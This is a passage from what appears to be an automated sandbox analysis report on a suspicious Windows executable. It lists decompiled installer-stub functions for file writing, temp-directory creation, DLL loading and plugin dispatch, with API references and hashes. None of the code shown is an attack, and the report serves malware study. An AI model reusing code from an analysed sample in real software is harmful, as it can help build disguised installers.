                                                                                                                      • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                                                                      • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                                                                      • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                                                                                                      • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                                                                                                      • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsa7685.tmp$C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dll$Call
                                                                                                                    • API String ID: 1941528284-2182429526
                                                                                                                    • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                                                                                    • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                                                                                                                    • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                                                                                    • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402E8E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t62;
				void* _t63;
				intOrPtr _t74;
				long _t75;
				int _t78;
				void* _t88;
				void* _t93;
				long _t96;
				signed int _t97;
				long _t98;
				int _t99;
				void* _t100;
				long _t101;
				void* _t102;

				_t97 = _a16;
				_t93 = _a12;
				_v12 = _t97;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t88 = _t93;
				if(_t93 == 0) {
					_t88 = 0x40f0e0;
				}
				_t60 = _a4;
				if(_a4 >= 0) {
					E004030B3( *0x423f98 + _t60);
				}
				_t62 = E00403081( &_a16, 4); // executed
				if(_t62 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t98 = _v12;
								if(_a16 < _t98) {
									_t98 = _a16;
								}
								if(E00403081(0x40b0e0, _t98) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x40b0e0, _t98,  &_a12, 0) == 0 || _t98 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t63);
										return _t63;
									} else {
										_v8 = _v8 + _t98;
										_a16 = _a16 - _t98;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t97) {
							_t97 = _a16;
						}
						if(E00403081(_t93, _t97) != 0) {
							_v8 = _t97;
							goto L45;
						} else {
							goto L34;
						}
					}
					_v16 = GetTickCount();
					E00406005(0x40b050);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403081(0x40b0e0, _t99) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t99;
						 *0x40b068 = 0x40b0e0;
						 *0x40b06c = _t99;
						while(1) {
							 *0x40b070 = _t88;
							 *0x40b074 = _v12; // executed
							_t74 = E00406025(0x40b050); // executed
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t100 =  *0x40b070; // 0x40f0e0
							_t101 = _t100 - _t88;
							_t75 = GetTickCount();
							_t96 = _t75;
							if(( *0x423ff4 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00404E84(0,  &_v88);
								_v16 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_t88 =  *0x40b070; // 0x40f0e0
									L24:
									if(_v24 != 1) {
										continue;
									}
									goto L45;
								}
								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
								if(_t78 == 0 || _v20 != _t101) {
									goto L29;
								} else {
									_v8 = _v8 + _t101;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}























                                                                                                                    0x00402e96
                                                                                                                    0x00402e9a
                                                                                                                    0x00402e9d
                                                                                                                    0x00402ea2
                                                                                                                    0x00402ea4
                                                                                                                    0x00402ea4
                                                                                                                    0x00402eab
                                                                                                                    0x00402eaf
                                                                                                                    0x00402eb3
                                                                                                                    0x00402eb5
                                                                                                                    0x00402eb5
                                                                                                                    0x00402eba
                                                                                                                    0x00402ebf
                                                                                                                    0x00402eca
                                                                                                                    0x00402eca
                                                                                                                    0x00402ed5
                                                                                                                    0x00402edc
                                                                                                                    0x0040302c
                                                                                                                    0x0040302c
                                                                                                                    0x00000000
                                                                                                                    0x00402ee2
                                                                                                                    0x00402ee6
                                                                                                                    0x00403017
                                                                                                                    0x0040306c
                                                                                                                    0x00403031
                                                                                                                    0x00403037
                                                                                                                    0x00403039
                                                                                                                    0x00403039
                                                                                                                    0x0040304a
                                                                                                                    0x00000000
                                                                                                                    0x0040304c
                                                                                                                    0x0040305f
                                                                                                                    0x00403011
                                                                                                                    0x00403011
                                                                                                                    0x0040302e
                                                                                                                    0x0040302e
                                                                                                                    0x00000000
                                                                                                                    0x00403066
                                                                                                                    0x00403066
                                                                                                                    0x00403069
                                                                                                                    0x00000000
                                                                                                                    0x00403069
                                                                                                                    0x0040305f
                                                                                                                    0x0040304a
                                                                                                                    0x00403077
                                                                                                                    0x00000000
                                                                                                                    0x00403077
                                                                                                                    0x0040301c
                                                                                                                    0x0040301e
                                                                                                                    0x0040301e
                                                                                                                    0x0040302a
                                                                                                                    0x00403074
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040302a
                                                                                                                    0x00402ef7
                                                                                                                    0x00402efa
                                                                                                                    0x00402eff
                                                                                                                    0x00402eff
                                                                                                                    0x00402f09
                                                                                                                    0x00402f0c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402f12
                                                                                                                    0x00402f12
                                                                                                                    0x00402f12
                                                                                                                    0x00402f1a
                                                                                                                    0x00402f1c
                                                                                                                    0x00402f1c
                                                                                                                    0x00402f2d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402f33
                                                                                                                    0x00402f36
                                                                                                                    0x00402f3c
                                                                                                                    0x00402f42
                                                                                                                    0x00402f4a
                                                                                                                    0x00402f50
                                                                                                                    0x00402f55
                                                                                                                    0x00402f5c
                                                                                                                    0x00402f5f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402f65
                                                                                                                    0x00402f6b
                                                                                                                    0x00402f6d
                                                                                                                    0x00402f7a
                                                                                                                    0x00402f7c
                                                                                                                    0x00402faa
                                                                                                                    0x00402fb0
                                                                                                                    0x00402fb9
                                                                                                                    0x00402fbe
                                                                                                                    0x00402fbe
                                                                                                                    0x00402fc5
                                                                                                                    0x00403005
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402fc7
                                                                                                                    0x00402fca
                                                                                                                    0x00402fea
                                                                                                                    0x00402fed
                                                                                                                    0x00402ff0
                                                                                                                    0x00402ff6
                                                                                                                    0x00402ffa
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403000
                                                                                                                    0x00402fd6
                                                                                                                    0x00402fde
                                                                                                                    0x00000000
                                                                                                                    0x00402fe5
                                                                                                                    0x00402fe5
                                                                                                                    0x00000000
                                                                                                                    0x00402fe5
                                                                                                                    0x00402fde
                                                                                                                    0x00402fc5
                                                                                                                    0x0040300d
                                                                                                                    0x00000000
                                                                                                                    0x0040300d
                                                                                                                    0x00000000
                                                                                                                    0x00402f12

                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 00402EEC
                                                                                                                    • GetTickCount.KERNEL32 ref: 00402F6D
                                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F9A
                                                                                                                    • wsprintfA.USER32 ref: 00402FAA
                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CountTick$FileWritewsprintf
                                                                                                                    • String ID: ... %d%%
                                                                                                                    • API String ID: 4209647438-2449383134
                                                                                                                    • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                                                                                    • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                                                                                                                    • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                                                                                    • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405346, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00405346(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                                                    0x00405351
                                                                                                                    0x00405355
                                                                                                                    0x00405358
                                                                                                                    0x0040535e
                                                                                                                    0x00405362
                                                                                                                    0x00405366
                                                                                                                    0x0040536e
                                                                                                                    0x00405375
                                                                                                                    0x0040537b
                                                                                                                    0x00405382
                                                                                                                    0x00405389
                                                                                                                    0x00405391
                                                                                                                    0x00405393
                                                                                                                    0x00000000
                                                                                                                    0x00405393
                                                                                                                    0x0040539d
                                                                                                                    0x004053a4
                                                                                                                    0x004053ba
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004053bc
                                                                                                                    0x004053c0

                                                                                                                    APIs
                                                                                                                    • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                                                                                                    • GetLastError.KERNEL32 ref: 0040539D
                                                                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                                                                                                                    • GetLastError.KERNEL32 ref: 004053BC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                    • String ID: C:\Users\user\Desktop$Ls@$\s@
                                                                                                                    • API String ID: 3449924974-776639217
                                                                                                                    • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                                                    • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                                                                                                                    • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                                                    • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405EBA, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00405EBA(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                                                                    0x00405ed1
                                                                                                                    0x00405eda
                                                                                                                    0x00405edc
                                                                                                                    0x00405edc
                                                                                                                    0x00405ee0
                                                                                                                    0x00405ef2
                                                                                                                    0x00405eec
                                                                                                                    0x00405eec
                                                                                                                    0x00405eec
                                                                                                                    0x00405ef6
                                                                                                                    0x00405f0a
                                                                                                                    0x00405f1e
                                                                                                                    0x00405f25

                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                                                                                                                    • wsprintfA.USER32 ref: 00405F0A
                                                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                                                                    • API String ID: 2200240437-4240819195
                                                                                                                    • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                                                    • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                                                                                                                    • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                                                    • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040589E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0040589E(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                                                    0x004058a2
                                                                                                                    0x004058a8
                                                                                                                    0x004058a9
                                                                                                                    0x004058a9
                                                                                                                    0x004058aa
                                                                                                                    0x004058b1
                                                                                                                    0x004058bb
                                                                                                                    0x004058c8
                                                                                                                    0x004058cb
                                                                                                                    0x004058d3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004058d7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004058d9
                                                                                                                    0x00000000
                                                                                                                    0x004058d9
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 004058B1
                                                                                                                    • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058CB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                    • String ID: "C:\Users\user\Desktop\WXs8v9QuE7.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                    • API String ID: 1716503409-797455424
                                                                                                                    • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                                    • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                                                                                                                    • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                                    • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1000198F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E1000198F(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x10004058 = _a8;
				 *0x1000405c = _a16;
				 *0x10004060 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E1000189E);
				_push(1); // executed
				_t34 = E10001D3B(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E100023F6(_t50);
					}
					E10002440(_t65, _t50);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100025FE(_t65, _t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x818; // 0x818
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100018A1(_t50);
								_t15 = _t50 + 0x818; // 0x818
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
								 *_t70 = 3;
								E100025FE(_t65, _t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100025FE(_t65, _t50);
							_t34 = GlobalFree(E1000159E(E100018A1(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E100025C4(_t50);
							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x808);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
								_t34 = E10001825( *0x10004054);
							}
						}
						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E100014C7(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E1000120C(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E100027AC(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

















                                                                                                                    0x1000198f
                                                                                                                    0x1000198f
                                                                                                                    0x1000198f
                                                                                                                    0x10001999
                                                                                                                    0x100019a1
                                                                                                                    0x100019ae
                                                                                                                    0x100019bc
                                                                                                                    0x100019bf
                                                                                                                    0x100019c1
                                                                                                                    0x100019c6
                                                                                                                    0x100019cb
                                                                                                                    0x10001ade
                                                                                                                    0x10001ade
                                                                                                                    0x100019d1
                                                                                                                    0x100019d5
                                                                                                                    0x100019d8
                                                                                                                    0x100019dd
                                                                                                                    0x100019df
                                                                                                                    0x100019e5
                                                                                                                    0x100019eb
                                                                                                                    0x10001a1b
                                                                                                                    0x10001a22
                                                                                                                    0x10001a46
                                                                                                                    0x10001a85
                                                                                                                    0x10001a48
                                                                                                                    0x10001a48
                                                                                                                    0x10001a49
                                                                                                                    0x10001a4c
                                                                                                                    0x10001a52
                                                                                                                    0x10001a56
                                                                                                                    0x10001a59
                                                                                                                    0x10001a5e
                                                                                                                    0x10001a5e
                                                                                                                    0x10001a65
                                                                                                                    0x10001a6b
                                                                                                                    0x10001a71
                                                                                                                    0x10001a7d
                                                                                                                    0x10001a7e
                                                                                                                    0x10001a81
                                                                                                                    0x10001a24
                                                                                                                    0x10001a25
                                                                                                                    0x10001a3a
                                                                                                                    0x10001a3a
                                                                                                                    0x10001a8f
                                                                                                                    0x10001a92
                                                                                                                    0x10001a9f
                                                                                                                    0x10001aa6
                                                                                                                    0x10001aae
                                                                                                                    0x10001ab1
                                                                                                                    0x10001ab1
                                                                                                                    0x10001aae
                                                                                                                    0x10001abe
                                                                                                                    0x10001ac6
                                                                                                                    0x10001acb
                                                                                                                    0x10001abe
                                                                                                                    0x10001ad3
                                                                                                                    0x00000000
                                                                                                                    0x10001ad5
                                                                                                                    0x00000000
                                                                                                                    0x10001ad6
                                                                                                                    0x10001ad3
                                                                                                                    0x100019ef
                                                                                                                    0x100019f2
                                                                                                                    0x10001a10
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001a13
                                                                                                                    0x10001a18
                                                                                                                    0x10001a18
                                                                                                                    0x10001a1a
                                                                                                                    0x00000000
                                                                                                                    0x10001a1a
                                                                                                                    0x100019f4
                                                                                                                    0x100019f5
                                                                                                                    0x100019fd
                                                                                                                    0x100019fe
                                                                                                                    0x00000000
                                                                                                                    0x100019fe
                                                                                                                    0x100019f7
                                                                                                                    0x100019f8
                                                                                                                    0x10001a06
                                                                                                                    0x00000000
                                                                                                                    0x10001a06
                                                                                                                    0x100019fb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x100019fb

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10001D3B: GlobalFree.KERNEL32 ref: 10001F80
                                                                                                                      • Part of subcall function 10001D3B: GlobalFree.KERNEL32 ref: 10001F85
                                                                                                                      • Part of subcall function 10001D3B: GlobalFree.KERNEL32 ref: 10001F8A
                                                                                                                    • GlobalFree.KERNEL32 ref: 10001A3A
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 10001AB1
                                                                                                                    • GlobalFree.KERNEL32 ref: 10001AD6
                                                                                                                      • Part of subcall function 100023F6: GlobalAlloc.KERNEL32(00000040,E8002080), ref: 10002428
                                                                                                                      • Part of subcall function 100027AC: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,?,10001A0B,00000000), ref: 100027FC
                                                                                                                      • Part of subcall function 100018A1: lstrcpyA.KERNEL32(00000000,10004018,00000000,10001967,00000000), ref: 100018BA
                                                                                                                      • Part of subcall function 100025FE: wsprintfA.USER32 ref: 10002661
                                                                                                                      • Part of subcall function 100025FE: GlobalFree.KERNEL32 ref: 10002706
                                                                                                                      • Part of subcall function 100025FE: GlobalFree.KERNEL32 ref: 1000272F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.236719394.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.236714134.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236724294.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236729631.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1767494692-3916222277
                                                                                                                    • Opcode ID: cc2172aae9428d7729c1cd1f9767f5c99f96f95dfb3527aa64e3656f829a4ce9
                                                                                                                    • Instruction ID: 1b0dc91ba56891906fbd81f42daf338cc13d67ac49f1a81c08d76b9c21eb2167
                                                                                                                    • Opcode Fuzzy Hash: cc2172aae9428d7729c1cd1f9767f5c99f96f95dfb3527aa64e3656f829a4ce9
                                                                                                                    • Instruction Fuzzy Hash: 0031B175601245AAFB41DF649CC5BDA3BE8FF062E0F048425FD066A09FCF749845CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 60%
                                                                                                                    			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423ff8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423fc8 =  *0x423fc8 +  *(_t34 - 4);
					return 0;
				}
